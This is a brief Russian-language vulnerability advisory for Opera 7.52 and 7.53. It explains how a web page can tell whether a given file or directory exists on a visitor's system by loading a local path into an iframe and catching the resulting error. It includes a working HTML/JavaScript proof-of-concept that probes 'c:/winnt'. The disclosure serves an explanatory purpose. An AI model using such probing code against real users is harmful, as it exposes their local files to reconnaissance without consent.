Программа: Opera 7.52 и 7.53
Уязвимость в Opera позволяет удаленному пользователю создать HTML код, который, когда будет загружен целевым пользователем, определить существование определенного файла или директории на целевой системе пользователя.
Когда несуществующий файл или каталог сопоставляется к iframe, браузер отображает ошибку. Удаленный пользователь может создать HMTL код, который загружает iframe и изменяет iframe URL к локальному файлу или каталогу и затем определяет их существование по сообщению об ошибке.
Пример:
<iframe src="https://xakep.ru/wp-content/uploads/post/23496/blank.html"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="c:/winnt";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.");
} catch (oErr) {
alert(sLocal+" exists.");
}
},
250
);
}
</script>
